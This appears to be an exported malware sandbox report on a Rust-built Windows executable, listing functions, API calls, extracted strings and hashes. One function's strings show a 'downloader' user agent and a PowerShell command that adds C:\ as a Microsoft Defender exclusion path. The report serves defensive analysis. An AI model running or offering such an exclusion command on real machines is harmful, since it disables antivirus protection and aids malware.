Instruction ID: 49428482cd19ce8eae4e7d70afc82c2b43e1d111c273491004a5723abe268625
Opcode Fuzzy Hash: 829f8cd180171ad52d862318de81fcb200bff6ef0ec59b74379b390dccbd49d8
Instruction Fuzzy Hash: E3D24B26608BC698E771DF29E8557E937A0FB4578CF044126CF4D9BB9ADF39A285C300

Function 00007FF6B18FE6B0 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 355
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32 ref: 00007FF6B18FE731
ioctlsocket.WS2_32 ref: 00007FF6B18FE75B
setsockopt.WS2_32 ref: 00007FF6B18FE7BB
GetLastError.KERNEL32 ref: 00007FF6B18FE7D5
setsockopt.WS2_32 ref: 00007FF6B18FE86A
WSAIoctl.WS2_32 ref: 00007FF6B18FE94F
GetLastError.KERNEL32 ref: 00007FF6B18FE95A
bind.WS2_32 ref: 00007FF6B18FE9BF
GetLastError.KERNEL32 ref: 00007FF6B18FE9DD
bind.WS2_32 ref: 00007FF6B18FEA7B
bind.WS2_32 ref: 00007FF6B18FEAE0
GetLastError.KERNEL32 ref: 00007FF6B18FEAEE
closesocket.WS2_32 ref: 00007FF6B18FEB68
setsockopt.WS2_32 ref: 00007FF6B18FEBA1
GetLastError.KERNEL32 ref: 00007FF6B18FEBAC
setsockopt.WS2_32 ref: 00007FF6B18FEBF9
GetLastError.KERNEL32 ref: 00007FF6B18FEC04
setsockopt.WS2_32 ref: 00007FF6B18FEC52
GetLastError.KERNEL32 ref: 00007FF6B18FEC5D

Strings

tcp open errortcp set_nonblocking errortcp bind local error, xrefs: 00007FF6B18FE7E3

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: ErrorLast$setsockopt$bind$IoctlSocketclosesocketioctlsocket
String ID: tcp open errortcp set_nonblocking errortcp bind local error
API String ID: 778962342-1475804424
Opcode ID: e9c3682a8e6b7150f9763393f5fee9a0bc73493d7a1cf38774702e4d5d4d091c
Instruction ID: 8a65f65cf783e1c610e76ef9f603dfb71174077ea517c4b1babf95704aa377ab
Opcode Fuzzy Hash: e9c3682a8e6b7150f9763393f5fee9a0bc73493d7a1cf38774702e4d5d4d091c
Instruction Fuzzy Hash: 35027E22A14BC59AE7208F78D8443E937A1FB9575CF019636DB9D96AD4EF78E2C4C300

Function 00007FF6B194F42F Relevance: 31.6, APIs: 12, Strings: 5, Instructions: 1886COMMON

Download Yara Rule

Strings

dns erro, xrefs: 00007FF6B194FE86
internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 00007FF6B1951563, 00007FF6B19516FF, 00007FF6B195174D, 00007FF6B1951843
, xrefs: 00007FF6B19502F2
, xrefs: 00007FF6B195017E
Network unreachabletcp connect error, xrefs: 00007FF6B1952770

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: $ $Network unreachabletcp connect error$dns erro$internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
API String ID: 0-1212955781
Opcode ID: c2f99d6e67fae9ccadff2c99ecae0a22e61cc70626a00def8c30e54879c40c14
Instruction ID: 71234394793a19b2660b903506d675f6b7226c070f739dc00f6b87d8094ca2aa
Opcode Fuzzy Hash: c2f99d6e67fae9ccadff2c99ecae0a22e61cc70626a00def8c30e54879c40c14
Instruction Fuzzy Hash: C3236D32A08BC699E7749F29D8447E933A4FB4878CF154126DF8D5BB9ADF789684C300

Function 00007FF6B19680D0 Relevance: 25.4, APIs: 12, Strings: 3, Instructions: 2922COMMON

Download Yara Rule

Strings

size overflows MAX_SIZE, xrefs: 00007FF6B196B94D
valid request parts, xrefs: 00007FF6B196B87E
cookie2, xrefs: 00007FF6B1969377

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: cookie2$size overflows MAX_SIZE$valid request parts
API String ID: 0-1797074916
Opcode ID: 25c31968d6f2a6f57aff7b2f847200fc880eb235a46a73f4fa6d556e10115c22
Instruction ID: c4cb07363c9b170dd35f36e35f1a76091bb5f9b5fc6be0a785c5fe32f393a2f9
Opcode Fuzzy Hash: 25c31968d6f2a6f57aff7b2f847200fc880eb235a46a73f4fa6d556e10115c22
Instruction Fuzzy Hash: 9F737162908BC6D9E7719F2898453F827A0FB5574CF049236CF8D5B79ADF39A281C390

Function 00007FF6B18B3410 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 577
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B19B2660: GetEnvironmentStringsW.KERNEL32 ref: 00007FF6B19B26E7

CloseHandle.KERNEL32 ref: 00007FF6B18B3613
CloseHandle.KERNEL32 ref: 00007FF6B18B3618

Strings

HOMEdownloader/0.2.8future still here when droppinginconsistent in drop, xrefs: 00007FF6B18B3817
powershe, xrefs: 00007FF6B18B3487
hell.exe, xrefs: 00007FF6B18B3479
#, xrefs: 00007FF6B18B3580
size overflows MAX_SIZE, xrefs: 00007FF6B18B7879, 00007FF6B18B7F70
C:\Progr, xrefs: 00007FF6B18B3970
*/*, xrefs: 00007FF6B18B3AF1
-CSet-MpPreference -ExclusionPath C:\, xrefs: 00007FF6B18B3559
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B18B77DF
gramData, xrefs: 00007FF6B18B3962

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: CloseHandle$EnvironmentStrings
String ID: #$*/*$-CSet-MpPreference -ExclusionPath C:\$C:\Progr$HOMEdownloader/0.2.8future still here when droppinginconsistent in drop$called `Result::unwrap()` on an `Err` value$gramData$hell.exe$powershe$size overflows MAX_SIZE
API String ID: 1178269279-409217020
Opcode ID: fe9ac81381d5b4425df8ac883aa128f6fe4790c1d7da0ffbbfb2ce03cb92ed97
Instruction ID: 7e827b779f8a38596106001e084dfdcb62c66f06efe7f4f60805a611c33b1348
Opcode Fuzzy Hash: fe9ac81381d5b4425df8ac883aa128f6fe4790c1d7da0ffbbfb2ce03cb92ed97
Instruction Fuzzy Hash: 90723A72908BC595E7528F38D4453E933A0FB59B4CF089236DF8C5A399EF79A285C360

Function 00007FF6B1924980 Relevance: 24.3, APIs: 7, Strings: 6, Instructions: 1525memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B1928630

Strings

TryFlatten polled after completionC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs, xrefs: 00007FF6B1928334
o HTTP/2, xrefs: 00007FF6B192690D
Map must not be polled after it returned `Poll::Ready`, xrefs: 00007FF6B19282A2
<Uri as Dst>::host should have a str, xrefs: 00007FF6B19281A1
already calledC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-util-0.1.10\src\service\oneshot.rs, xrefs: 00007FF6B19281BE
internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 00007FF6B19282BE, 00007FF6B192834C

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID: <Uri as Dst>::host should have a str$Map must not be polled after it returned `Poll::Ready`$TryFlatten polled after completionC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs$already calledC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-util-0.1.10\src\service\oneshot.rs$internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$o HTTP/2
API String ID: 3298025750-3389827597
Opcode ID: c5d168dd4c36cec68aa6a8fcdca4d580e0f7ea34bd23962ecd848b9b3dea9d3e
Instruction ID: 6eb801b3fdf0b6b772cfc9e48687a0fdd83a9589ac24d4f042cdd5373a528acb
Opcode Fuzzy Hash: c5d168dd4c36cec68aa6a8fcdca4d580e0f7ea34bd23962ecd848b9b3dea9d3e
Instruction Fuzzy Hash: BD037E66A08BC295E7519F38D4503E937A0FB59B4CF485236DF8C8B39ADF38A585C360

Function 00007FF6B19DB220 Relevance: 24.2, APIs: 10, Strings: 3, Instructions: 1451COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B19AD040: HeapFree.KERNEL32 ref: 00007FF6B19AD0EB
Part of subcall function 00007FF6B19AD040: HeapFree.KERNEL32 ref: 00007FF6B19AD101

GetSystemInfo.KERNELBASE ref: 00007FF6B19DB3D3

Part of subcall function 00007FF6B19DA0A0: CreateIoCompletionPort.KERNEL32 ref: 00007FF6B19DA0EF

Strings

=, xrefs: 00007FF6B19DB34E
assertion failed: sharded_size.is_power_of_two()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\util\sharded_list.rs, xrefs: 00007FF6B19DD054
TOKIO_WORKER_THREADS, xrefs: 00007FF6B19DB389

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$CompletionCreateInfoPortSystem
String ID: =$TOKIO_WORKER_THREADS$assertion failed: sharded_size.is_power_of_two()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\util\sharded_list.rs
API String ID: 228279100-3332584616
Opcode ID: efb17b023c691b911a73a148e1185da86eed2d23c9017ba137d39dffbd5caec6
Instruction ID: be349197eb94175028ed046ea9915585879edadd86a79aad69225a0da63986f8
Opcode Fuzzy Hash: efb17b023c691b911a73a148e1185da86eed2d23c9017ba137d39dffbd5caec6
Instruction Fuzzy Hash: 60030A32A09BC295E7419F28D4543E937A0FB55B4CF488236CF8D9B39ADF79A195C320

Function 00007FF6B1913420 Relevance: 23.4, APIs: 9, Strings: 4, Instructions: 691filenativeCOMMON

Download Yara Rule

APIs

NtCancelIoFileEx.NTDLL ref: 00007FF6B19135C2
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6B19136E9
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6B1913B44

Strings

, xrefs: 00007FF6B1913651
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B1913C4B, 00007FF6B1913D38, 00007FF6B1913D6C, 00007FF6B1913DBD
, xrefs: 00007FF6B1913649
Out of bounds access, xrefs: 00007FF6B1913D8D, 00007FF6B1913DDB

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressSingleWake$CancelFile
String ID: $ $Out of bounds access$called `Result::unwrap()` on an `Err` value
API String ID: 3485050077-3214395814
Opcode ID: 4de9ad23572909fc598756202bc1c53385ebfb293941ef08e870fe8884598748
Instruction ID: b8025e195d17435e311120c1cf9fb99da08323e09a8d0200b8010bd5580d00ab
Opcode Fuzzy Hash: 4de9ad23572909fc598756202bc1c53385ebfb293941ef08e870fe8884598748
Instruction Fuzzy Hash: 5752C162A087D2B5EB609F2D94402B927B5FB44BACF540436CB4E87796DE3DE3A5C340

Function 00007FF6B1956190 Relevance: 16.5, APIs: 7, Strings: 2, Instructions: 751COMMON

Download Yara Rule

Strings

overflowC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-1.5.1\src\rt\io.rs, xrefs: 00007FF6B1956281, 00007FF6B1956331
assertion failed: prev.ref_count() >= 1, xrefs: 00007FF6B1956E7A, 00007FF6B1956E97

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: assertion failed: prev.ref_count() >= 1$overflowC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-1.5.1\src\rt\io.rs
API String ID: 0-864200441
Opcode ID: 062294688d42931112446d43a82151d49123cd82509930ee2f3afbd80bf5a562
Instruction ID: cc5b2aeaf94e816b50132fc17de9ac29550371b6b8b4a2537e151207ffa670ba
Opcode Fuzzy Hash: 062294688d42931112446d43a82151d49123cd82509930ee2f3afbd80bf5a562
Instruction Fuzzy Hash: 1A825932A15BC291EB519F29E4443E977A0FB58B9DF448236CF9C9B3A5DF38A095C310

Function 00007FF6B19C9220 Relevance: 16.4, APIs: 4, Strings: 5, Instructions: 690memoryCOMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B19C92D8
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B19C93BD
HeapFree.KERNEL32 ref: 00007FF6B19C95F0
CloseHandle.KERNEL32 ref: 00007FF6B19C9B71

Strings

cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs, xrefs: 00007FF6B19C98AE
thread name may not contain interior null bytes, xrefs: 00007FF6B19C9D89
RUST_MIN_STACKfatal runtime error: something here is badly broken!, xrefs: 00007FF6B19C950A
assertion failed: prev.ref_count() >= 1, xrefs: 00007FF6B19C9D3F
assertion failed: shared.shutdown_tx.is_some()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\pool.rs, xrefs: 00007FF6B19C9DAA

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressSingleWake$CloseFreeHandleHeap
String ID: RUST_MIN_STACKfatal runtime error: something here is badly broken!$assertion failed: prev.ref_count() >= 1$assertion failed: shared.shutdown_tx.is_some()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\pool.rs$cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs$thread name may not contain interior null bytes
API String ID: 359871307-3911247211
Opcode ID: 30afcc7eaa1136219c9342c1add740dd5789d851429684084f9da650dcfd7c9e
Instruction ID: 215dffb5f0213f3721a09e9b76106a8794c2a46f3807b6892e3086b6c877b531
Opcode Fuzzy Hash: 30afcc7eaa1136219c9342c1add740dd5789d851429684084f9da650dcfd7c9e
Instruction Fuzzy Hash: 4C628C22A08BC699EB619F29D8403F927A0FB4578CF544536DB9E9778ADF3DE584C300

Function 00007FF6B19DA0A0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 521
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIoCompletionPort.KERNEL32 ref: 00007FF6B19DA0EF
GetLastError.KERNEL32 ref: 00007FF6B19DA32D

Part of subcall function 00007FF6B19BFA30: GetProcessHeap.KERNEL32 ref: 00007FF6B1A08561

HeapReAlloc.KERNEL32 ref: 00007FF6B19DA434
HeapFree.KERNEL32 ref: 00007FF6B19DA487
HeapReAlloc.KERNEL32 ref: 00007FF6B19DA814
HeapFree.KERNEL32 ref: 00007FF6B19DA83D
CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00007FF6B19DAA58

Strings

assertion failed: shards > 0C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\time\mod.rs, xrefs: 00007FF6B19DA968

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Heap$AllocFree$CloseCompletionCreateErrorHandleLastPortProcess
String ID: assertion failed: shards > 0C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\time\mod.rs
API String ID: 3294583982-1008839168
Opcode ID: acf715327219b4b58ff7e6b9b47b4ee6acdf0d6a4a76ea78bed5a0cc96865f93
Instruction ID: f5492526b9cdd785f142be0d2cfdd33b3125e72b22011cc5270f8911c5677960
Opcode Fuzzy Hash: acf715327219b4b58ff7e6b9b47b4ee6acdf0d6a4a76ea78bed5a0cc96865f93
Instruction Fuzzy Hash: BC42A132918BC295E7659F2999043F933A0FB9974CF049239DF9D5A796EF38A2D4C300

Function 00007FF6B19C7890 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 223
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,?,?,00007FF6B1982420), ref: 00007FF6B19C78D9
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,?,?,00007FF6B1982420), ref: 00007FF6B19C78EC
recv.WS2_32 ref: 00007FF6B19C795B
WSAGetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,?,?,00007FF6B1982420), ref: 00007FF6B19C796A
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?), ref: 00007FF6B19C7BA0
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?), ref: 00007FF6B19C7BB3

Strings

filled overflowC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\io\poll_evented.rs, xrefs: 00007FF6B19C7B15

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$ErrorLastrecv
String ID: filled overflowC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\io\poll_evented.rs
API String ID: 2022872673-333188784
Opcode ID: 91ee69e3ba5903e545c5502f3b72024138f04a546790cf26cf1c0266290041e9
Instruction ID: 37807065c8c5602307a5fecfc9de3be2cd5a9d952fdfa7935d92913c9aa320b0
Opcode Fuzzy Hash: 91ee69e3ba5903e545c5502f3b72024138f04a546790cf26cf1c0266290041e9
Instruction Fuzzy Hash: 4891A162B04A82A5EB149BAEE8442BD2761BB487ACF504532DF5DC37D5DF3CE582C300

Function 00007FF6B19B0A00 Relevance: 10.7, APIs: 7, Instructions: 187
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileInformationByHandle.KERNELBASE ref: 00007FF6B19B0B60
GetFileInformationByHandleEx.KERNEL32 ref: 00007FF6B19B0B9B
GetLastError.KERNEL32 ref: 00007FF6B19B0C21
CloseHandle.KERNEL32 ref: 00007FF6B19B0C3D
FindFirstFileW.KERNEL32 ref: 00007FF6B19B0C70
FindClose.KERNEL32 ref: 00007FF6B19B0C7F
HeapFree.KERNEL32 ref: 00007FF6B19B0D16

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FileHandle$CloseFindInformation$ErrorFirstFreeHeapLast
String ID:
API String ID: 3677867274-0
Opcode ID: b093f2cdba3243464194cfadd1addba34fb54bbd9ede684bffbea2656c455d18
Instruction ID: fc886a4ff4b5896379f4f75c8a0cc8569f148b35d89231289ee859f1bb6afe06
Opcode Fuzzy Hash: b093f2cdba3243464194cfadd1addba34fb54bbd9ede684bffbea2656c455d18
Instruction Fuzzy Hash: F9818D32A04B829AF7308F69E8843AE73B1FB4439CF144225CF994BB95DF78A5818340

Function 00007FF6B1914160 Relevance: 9.1, APIs: 6, Instructions: 128
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 00007FF6B19141E6
RtlNtStatusToDosError.NTDLL ref: 00007FF6B19141F6
CreateIoCompletionPort.KERNELBASE ref: 00007FF6B1914296
SetFileCompletionNotificationModes.KERNEL32 ref: 00007FF6B19142A7

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: CompletionCreateFile$ErrorModesNotificationPortStatus
String ID:
API String ID: 986160054-0
Opcode ID: 15a3c952cf87fd16cc51938b2d26ddcd1a0af99120fea073c0f48e46dcce61a0
Instruction ID: 768816f5d9e28b81dcb9c8720c6793703fc6ae669a700296219d1af43376df13
Opcode Fuzzy Hash: 15a3c952cf87fd16cc51938b2d26ddcd1a0af99120fea073c0f48e46dcce61a0
Instruction Fuzzy Hash: CA518232604B81AAE7209F24E8443A937A5FB447ACF444235EB9D87BD8DF7CE595C380

Function 00007FF6B195DCD0 Relevance: 6.7, APIs: 5, Instructions: 428
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 00007FF6B195E0D5
HeapFree.KERNEL32 ref: 00007FF6B195E2B6
HeapFree.KERNEL32 ref: 00007FF6B195E393

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

